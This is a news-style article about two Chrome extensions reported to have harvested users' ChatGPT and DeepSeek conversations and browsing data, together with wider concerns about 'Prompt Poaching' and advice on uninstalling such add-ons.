Your private conversations with AI chatbots are under siege, and it’s not just hackers you need to worry about. Two popular Chrome extensions, trusted by over 900,000 users, have been caught red-handed stealing ChatGPT and DeepSeek chats alongside browsing data. But here's where it gets even more alarming: these extensions, masquerading as handy AI tools, were quietly funneling this sensitive information to servers controlled by cybercriminals every 30 minutes. And this is the part most people miss—they did it all under the guise of collecting 'anonymous analytics.'
The culprits? 'Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI' (600,000 users) and 'AI Sidebar with Deepseek, ChatGPT, Claude, and more' (300,000 users). These extensions weren’t just snooping—they were systematically harvesting every word you typed into your AI chats and every URL you visited. This isn’t an isolated incident, either. Just weeks ago, Urban VPN Proxy, another extension with millions of users, was busted for similar spying activities. Cybersecurity experts have dubbed this growing trend 'Prompt Poaching,' and it’s becoming a favorite tactic for bad actors.
Here’s how it works: Once installed, these rogue extensions ask for permission to collect 'anonymized' browser data to 'enhance your experience.' If you agree, the malware embedded within starts scraping your chatbot conversations by targeting specific elements on the webpage, storing them locally, and then shipping them off to remote servers like 'chatsaigpt[.]com' or 'deepaichats[.]com.' To add insult to injury, the attackers even used an AI-powered platform called Lovable to host their privacy policies and other infrastructure, making their tracks harder to follow.
But here’s the real kicker: even legitimate extensions are getting in on the action. Secure Annex recently revealed that popular tools like Similarweb (1 million users) and Sensor Tower's Stayfocusd (600,000 users) have been caught monitoring AI conversations too. Similarweb, for instance, updated its terms in January 2026 to explicitly state it collects AI inputs and outputs, including prompts, queries, and even attached files. While they claim to anonymize data, they admit some sensitive information might slip through the cracks. This raises a controversial question: Is this a blatant violation of user trust, or a necessary trade-off for 'free' services?
The stakes are higher than you think. This stolen data isn’t just sitting idle—it can be weaponized for corporate espionage, identity theft, or targeted phishing attacks. Imagine your company’s confidential discussions or personal secrets ending up on underground forums. As OX Security researcher Moshe Siman Tov Bustan warns, 'Organizations whose employees installed these extensions may have unknowingly exposed intellectual property, customer data, and confidential business information.'
So, what can you do? First, uninstall these extensions immediately. Second, think twice before installing any browser add-on, even if it’s 'Featured' or from a seemingly reputable source. And finally, let’s spark a debate: Are we sacrificing too much privacy for convenience? Should browser stores like Chrome Web Store be held more accountable for vetting these extensions? Share your thoughts in the comments—this conversation is just beginning.